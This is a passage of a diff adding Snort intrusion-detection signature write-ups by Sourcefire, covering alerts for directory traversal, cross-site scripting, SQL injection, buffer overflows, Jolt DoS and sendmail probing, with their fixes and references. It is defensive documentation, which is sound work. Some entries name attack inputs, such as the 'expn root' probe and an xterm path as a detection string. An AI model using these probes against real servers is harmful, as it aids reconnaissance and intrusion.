+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Apply the patch referenced in the Microsoft link.
+
+--
+Contributors:
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0884
+
+Bugtraq
+http://www.securityfocus.com/bid/1806
+
+Microsoft
+http://www.microsoft.com/technet/security/bulletin/ms00-078.asp
+
+--
--- /dev/null
+++ b/doc/signatures/848.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+848
+
+--
+Summary:
+This event is generated when an attempt is made to execute a directory
+traversal attack.
+
+--
+Impact:
+Information disclosure. This is a directory traversal attempt which can
+lead to information disclosure and possible exposure of sensitive
+system information.
+
+--
+Detailed Information:
+Directory traversal attacks usually target web, web applications and ftp
+servers that do not correctly check the path to a file when requested by
+the client.
+
+This can lead to the disclosure of sensitive system information which may
+be used by an attacker to further compromise the system.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An authorized user or anonymous user can use the directory traversal 
+technique, to browse folders outside the ftp root directory. Information
+gathered may be used in further attacks against the host.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade the software to the latest non-affected version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/100000829.txt
@@ -0,0 +1,56 @@
+
+
+Rule:
+
+--
+Sid:
+100000829
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site scripting vulnerability in the "HiveMail" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site scripting vulnerability via the "name" parameter in the "address.view.php" script used by the "HiveMail" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to retrieve sensitive data, execute system binaries or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using HiveMail
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/1576.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1576
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000800.txt
@@ -0,0 +1,56 @@
+
+
+Rule:
+
+--
+Sid:
+100000800
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site scripting vulnerability in the "Pivot" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site scripting vulnerability via the "name" parameter in the "editor_menu.php" script used by the "Pivot" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to retrieve sensitive data, execute system binaries or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using Pivot
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/100000700.txt
@@ -0,0 +1,56 @@
+
+
+Rule:
+
+--
+Sid:
+100000700
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site scripting vulnerability in the "Vincent Leclercq News" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site scripting vulnerability via the "disable" parameter in the "diver.php" script used by the "Vincent Leclercq News" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to retrieve sensitive data, execute system binaries or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using Vincent Leclercq News
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/2517.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+2517
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Microsoft implementation of the Private
+Communications Transport (PCT) protocol.
+
+--
+Impact:
+Execution of arbitrary code. Unauthorized administrative access to an
+affected host.
+
+--
+Detailed Information:
+A vulnerability exists in the handling of PCT requests that
+can be manipulated to give an attacker the opportunity to execute
+arbitrary code of their choosing leading to a possible remote
+administrative compromize of an affected host.
+
+The condition exists because of poor error handling routines in the
+Microsoft Secure Sockets Layer (SSL) library.
+
+--
+Affected Systems:
+	Microsoft Windows NT, 2000, 2003 and XP systems using PCT
+
+--
+Attack Scenarios:
+An attcker needs to make a specially crafted PCT request to an affected system.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Disable the use of PCT
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1847.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1847
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1362.txt
@@ -0,0 +1,59 @@
+Rule: 
+
+--
+Sid: 
+1362
+
+-- 
+Summary:
+A web command execution attack involving the use of a
+"xterm" command
+
+-- 
+Impact: 
+Possible intelligence gathering activity or an attempt to gain elevated privileges on the server by using xterm to open another connection.
+
+-- 
+Detailed Information: 
+The attacker may have gained the ability to execute system commands remotely or the web server may be incorrectly configured to allow such access.
+
+This rule generates an event when a "xterm" command is used over a plain-text (unencrypted) connection on one of the specified web ports to the target web server. The "xterm" command may be used establish an interactive shell session to the machine.
+
+The rule looks for the "xterm" command in the client to web server network traffic and does not indicate whether the command was actually successful. The presence of the "xterm" command in the URI indicates that an attacker attempted to trick the web server into executing system in non-interactive mode i.e. without a valid shell session.
+
+Alternatively this rule may generate an event in an unencrypted HTTP tunneling connection to the server or a shell connection via another exploit against the web server.
+
+-- 
+Attack Scenarios: 
+An attacker uses a "xterm" command to open an interactive session then uses that session to move a rootkit to the system.
+
+--
+Ease of Attack: 
+Simple. No exploit software required
+
+-- 
+False Positives: 
+Any string containing '/usr/X11R6/bin/xterm
+' in the URL will trigger the alarm.
+
+--
+False Negatives: 
+none known
+
+-- 
+Corrective Action: 
+Check the web server software for vulnerabilities and possible upgrades or patches for the system to the latest version of the web software, also investigate the server logs for signs of compromise
+
+Webservers should not be allowed to view or execute files and binaries outside of it's designated web root or cgi-bin. Disallowing execution of this binary via a URI is suggested.
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2596.txt
@@ -0,0 +1,68 @@
+Rule:
+
+
+--
+Sid:
+2596
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer overflow
+associated with the Mail Transfer Agent Exim.
+
+--
+Impact:
+A successful attack may allow the execution of arbitrary code on a vulnerable
+server with the privilege of the process running Exim.
+
+--
+Detailed Information:
+Exim is vulnerable to a buffer overflow, permitting an attacker to execute
+arbitrary code.  The vulnerability may be exploited if Exim is configured to
+verify header syntax in the e-mail message body.  This is not the default
+configuration.  If an attacker supplies a large number of spaces after certain
+header fields, it may be possible to cause a buffer overflow.
+
+--
+Affected Systems:
+Exim prior to version 4.34
+
+--
+Attack Scenarios:
+An attacker can create and send mail with a malformed header,
+possibly causing a buffer overflow and permitting the execution of arbitrary code.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References
+
+Bugtraq:
+http://www.securityfocus.com/bid/10291
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0400
+
+Other:
+http://www.guninski.com/exim1.html
+
+--
--- /dev/null
+++ b/doc/signatures/100000726.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000726
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection vulnerability in the "Vincent-Leclercq News" application running on a webserver. Access to the file "diver.php" with SQL commands being passed as the "id" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a remote machine via the "id" parameter in the "diver.php" script used by the "Vincent-Leclercq News" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to compromise the database backend for the application, the attacker may also be able to execute system binaries or malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Vincent-Leclercq News
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application if user input is not correctly sanitized or checked before passing that input to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
--- /dev/null
+++ b/doc/signatures/1834.txt
@@ -0,0 +1,81 @@
+Rule:
+
+--
+Sid:
+1834
+
+--
+Summary:
+This event is generated when a cross-site scripting attack is being 
+attempted, or a potential attacker is testing your site to determine if 
+it is vulnerable.
+
+--
+Impact:
+Successful cross-site scripting attacks generally target the users of 
+your web site. Attackers can potentially gain access to your users' 
+cookies or session ids, allowing the attacker to impersonate your
+user. They could also set up elaborate fake logon screens to steal 
+user names and passwords.
+
+--
+Detailed Information:
+Whenever a web application accepts input (either via the URL or the 
+POST method) and then uses that input as part of the HTML of a new page 
+without filtering, the application is vulnerable to cross-site 
+scripting.  The traditional means of exploiting this is to embed a 
+"<SCRIPT>" tag into the input. The code following the tag is then 
+executed by the victim's browser.
+
+--
+Affected Systems:
+Many older versions of web server software are affected, as are numerous
+web applications.
+
+--
+Attack Scenarios:
+The most common avenue of attack is for the attacker to send an HTML 
+formatted email to the victim. The email will contain a link to a 
+specially crafted URL which contains the exploit. When the victim clicks
+on the link, they are directed to the vulnerable web site and the attack
+code is executed by their browser.
+
+--
+Ease of Attack:
+Moderately Easy.  Exploit code exists to automate attacks against users 
+of some widely deployed web applications which are known to be 
+vulnerable. 
+
+Finding vulnerabilities in other, including proprietary, web
+applications is fairly trivial and existing exploit code could easily be
+modified to take advantage of newly discovered vulnerabilities.
+
+--
+False Positives:
+Web pages that legimately include the <SCRIPT> tag could generate this 
+event under certain circumstances.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Determine if your web application is actually vulnerable to this 
+attack. If it is and the application is not of your own design, contact 
+the authors or vendor and see if there is a patch or newer version.
+
+If the application is proprietary to you or your company, ensure that it 
+properly validates input.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Kevin Peuhkurinen
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/306.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid: 306
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a vulnerability in VQ Server to cause a Denial of Service (DoS).
+
+--
+Impact:
+Serious. A Denial of Service on the target server is possible.
+
+--
+Detailed Information:
+vqServer is a personal web server that runs on Microsoft Windows, Linux and Solaris. Version 1.4.49 suffers from a DoS condition if a long GET request is issued to the server.
+
+Affected Systems:
+	vqServer 1.4.49
+
+--
+Attack Scenarios:
+Exploit scripts are available
+
+--
+Ease of Attack:
+Simple. Exploits are available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/1610
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0766
+
+vqSoft:
+http://www.vqsoft.com/
+
+
+--
--- /dev/null
+++ b/doc/signatures/1633.txt
@@ -0,0 +1,51 @@
+Rule:
+
+--
+Sid: 1633
+
+--
+Summary:
+This event is generated when activity relating to network chat clients is detected.
+
+--
+Impact:
+Policy Violation. Use of chat clients to communicate with unkown external sources may be against the policy of many organizations.
+
+--
+Detailed Information:
+Instant Messaging (IM) and other chat related client software can allow users to transfer files directly between hosts. This can allow malicious users to circumvent the protection offered by a network firewall.
+
+Vulnerabilities in these clients may also allow remote attackers to gain unauthorized access to a host.
+
+--
+Attack Scenarios:
+A user may transfer sensitive company information to an external party using the file transfer capabilities of an IM client.
+
+An attacker might utilize a vulnerability in an IM client to gain access to a host, then upload a Trojan Horse program to gain control of that host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow the use of IM clients on the protected network and enforce or implement an organization wide policy on the use of IM clients.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <brian.caswell@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/660.txt
@@ -0,0 +1,55 @@
+
+--
+Sid:
+660
+
+--
+Summary:
+This event is generated when an attempt is made to expand the alias of root on a Sendmail server.
+
+--
+Impact:
+Reconnaissance.  This is an attempt to discover email addresses associated with the alias of root for a Sendmail server.
+
+--
+Detailed Information:
+An attacker may probe for email addresses associated with the alias of root on a Sendmail server.  The "expn" command expands the alias into a list of actual recipients associated with the alias.  This command can be used to determine who reads the mail sent to the administrator.  It may be used by spammers to get valid email accounts or may be used to discover valid accounts on the Sendmail server.
+
+--
+Affected Systems:
+Versions of Sendmail that do not disable expn.
+
+--
+Attack Scenarios:
+An attacker can telnet to the Sendmail server and issue the command "expn root" to gather email addresses associated with the alias of root.
+
+--
+Ease of Attack:
+Easy.  Telnet to the Sendmail server and issue the command "expn root". 
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Edit the /etc/sendmail.cf file to disable expn by setting PrivacyOptions=noexpn. 
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS31
+
+
+--
--- /dev/null
+++ b/doc/signatures/316.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid: 316
+
+--
+Summary:
+This event is generated when an attempt is made to escalate privileges remotely using a vulnerability in mountd.
+
+--
+Impact:
+System compromize presenting the attacker with escalated system privileges .
+
+--
+Detailed Information:
+Some implementations of the Network File System (NFS) on Linux systems use a vulnerable version of mountd that is subject to a buffer overflow condition in the logging subsystem.
+
+The mountd logging facility also logs failed attempts to mount shared resources, even if NFS is not enabled on the system. This means that exploitation of this issue is possible wether or not NFS is being used.
+
+Affected Systems:
+	Caldera OpenLinux Standard 1.2
+	RedHat Linux 2.0, 2.1, 3.0.3, 4.0, 4.1, 4.2, 5.0, 5.1
+
+--
+Attack Scenarios:
+Exploit scripts are available
+
+--
+Ease of Attack:
+Simple. Exploits are available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/121
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0917
+
+CERT:
+http://www.cert.org/advisories/CA-1998-12.html
+http://www.cert.org/summaries/CS-98-08.html
+
+--
--- /dev/null
+++ b/doc/signatures/1229.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid: 
+1229
+
+--
+Summary:
+This event is generated when activity relating to spurious ftp traffic 
+is detected on the network.
+
+--
+Impact:
+Varies from information gathering to a serious compromise of an ftp 
+server.
+
+--
+Detailed Information:
+FTP is used to transfer files between hosts. This event is indicative of
+spurious activity in FTP traffic between hosts.
+
+The event may be the result of a transfer of a known protected file or 
+it could be an attempt to compromise the FTP server by overflowing a 
+buffer in the FTP daemon or service.
+
+--
+Attack Scenarios:
+A user may transfer sensitive company information to an external party 
+using FTP.
+
+An attacker might utilize a vulnerability in an FTP daemon to gain 
+access to a host, then upload a Trojan Horse program to gain control of 
+that host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow access to FTP resources from hosts external to the protected 
+network.
+
+Use secure shell (ssh) to transfer files as a replacement for FTP.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <brian.caswell@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1502.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1502
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2153.txt
@@ -0,0 +1,58 @@
+Rule:
+--
+Sid:
+2153
+
+--
+Summary:
+This event is generated when a remote user attempts to access autohtml.php on a web server. This may indicate an attempt to exploit a directory traversal vulnerability in PHP-Proxima, a web site portal application.
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+This event may indicate an attempt to exploit a vulnerability in the autohtml.php script within PHP-Proxima. An attacker can use directory traversal techniques when accessing autohtml.php to view hidden files and directories on the web server with the access privileges of the server. 
+
+--
+Affected Systems:
+Any server running PHP-Proxima.
+
+--
+Attack Scenarios:
+An attacker can use directory traversal techniques when executing autohtml.php to view directories and files on the web server.
+
+--
+Ease of Attack:
+Simple. A proof of concept exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Comment out or remove the "include("autohtml/$name");" line from the autohtml.php script.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Sourcefire Technical Publications Team
+Jen Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/7598
+
+Nessus
+http://cgi.nessus.org/plugins/dump.php3?id=11630
+
+--
--- /dev/null
+++ b/doc/signatures/100000323.txt
@@ -0,0 +1,78 @@
+
+
+Rule:
+
+--
+Sid:
+100000323
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "ScozNet ScozNews" application running on a 
+webserver. Access to the file "news.php" using a remote file being passed as 
+the "main_path" parameter may indicate that an exploitation attempt has been 
+attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "main_path" parameter in the "news.php" script used by 
+the "ScozNet ScozNews" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using ScozNet ScozNews
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/100000801.txt
@@ -0,0 +1,56 @@
+
+
+Rule:
+
+--
+Sid:
+100000801
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site scripting vulnerability in the "Pivot" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site scripting vulnerability via the "js_name" parameter in the "editor_menu.php" script used by the "Pivot" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to retrieve sensitive data, execute system binaries or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using Pivot
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/268.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+268
+
+--
+Summary:
+This event is generated when a remote attacker attempts to send large, fragmented IP packets to the internal network, indicating a Jolt Denial of Service (DoS) attack.
+
+--
+Impact:
+Denial of service.
+
+--
+Detailed Information:
+Jolt is a DoS attack characterized by large, fragmented IP packets that, when launched at a Windows system, can hang or crash the computer. 
+
+--
+Affected Systems:
+Windows 95
+Windows 98
+Windows NT
+Windows 2000
+
+--
+Attack Scenarios:
+An attacker sends oversized, fragmented IP packets to a target computer. If the computer is running an unpatched version of Windows, it may crash.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Install the latest patches available for your operating system.
+
+Implement a packet-filtering firewall to block inappropriate traffic to the network.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Sourcefire Technical Publications Team
+Jen Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/1989.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid: 1989
+
+--
+Summary:
+This event is generated when activity relating to network chat clients is detected.
+
+--
+Impact:
+Policy Violation. Use of chat clients to communicate with unkown external sources may be against the policy of many organizations.
+
+--
+Detailed Information:
+Instant Messaging (IM) and other chat related client software can allow users to transfer files directly between hosts. This can allow malicious users to circumvent the protection offered by a network firewall.
+
+Vulnerabilities in these clients may also allow remote attackers to gain unauthorized access to a host.
+
+--
+Attack Scenarios:
